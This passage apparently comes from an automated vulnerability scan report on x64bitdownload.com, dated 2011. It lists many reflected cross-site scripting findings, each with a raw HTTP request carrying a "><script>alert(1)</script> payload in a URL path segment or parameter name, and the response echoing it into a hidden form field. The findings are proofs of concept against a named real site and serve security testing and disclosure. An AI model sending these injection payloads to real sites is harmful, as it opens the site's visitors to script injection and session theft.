HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:46 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18" /> ...[SNIP]...
1.146. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0caf"><script>alert(1)</script>6aa48f4bf87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:26:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:36:44 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa0d"><script>alert(1)</script>6f7a56462ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:31:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc60f"><script>alert(1)</script>60697c60e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:31:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:12 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 85699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67" /> ...[SNIP]...
1.149. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d41a"><script>alert(1)</script>99f91a14c93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:27:02 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:37:33 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 85702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f845d"><script>alert(1)</script>ffca716742e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:30:02 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d3b"><script>alert(1)</script>93a1874d47f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:30:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:41:03 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f" /> ...[SNIP]...
1.152. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe46"><script>alert(1)</script>fbe8aea8d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:26:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:36:54 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6340"><script>alert(1)</script>56e52f2f479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:31:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36536"><script>alert(1)</script>62e91f4268d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:43:00 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d" /> ...[SNIP]...
1.155. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695c3"><script>alert(1)</script>3a42e06dc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:28:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:38:31 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4190"><script>alert(1)</script>b2c86d6f802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:30:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98438"><script>alert(1)</script>296e60cbefa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:09 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 82513
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa" /> ...[SNIP]...
1.158. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72117"><script>alert(1)</script>b715466a845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:27:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:37:30 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 82516
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-downloads-3-0-d.html?72117"><script>alert(1)</script>b715466a845=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad71c"><script>alert(1)</script>a9e556abaea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:30:33 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categoriesad71c"><script>alert(1)</script>a9e556abaea/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae6b"><script>alert(1)</script>f87477f9823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:31:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:41:46 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79301
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.htmleae6b"><script>alert(1)</script>f87477f9823" /> ...[SNIP]...
1.161. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f940"><script>alert(1)</script>3ed6d3e13d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:27:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:37:40 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html?3f940"><script>alert(1)</script>3ed6d3e13d4=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c422"><script>alert(1)</script>5ca42390231 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 404 Not Found Date: Mon, 24 Jan 2011 15:31:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content- ...[SNIP]... <input type="hidden" name="retpage" value="/categories8c422"><script>alert(1)</script>5ca42390231/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e997"><script>alert(1)</script>a563157449d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html7e997"><script>alert(1)</script>a563157449d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:32:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:42:47 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 81909
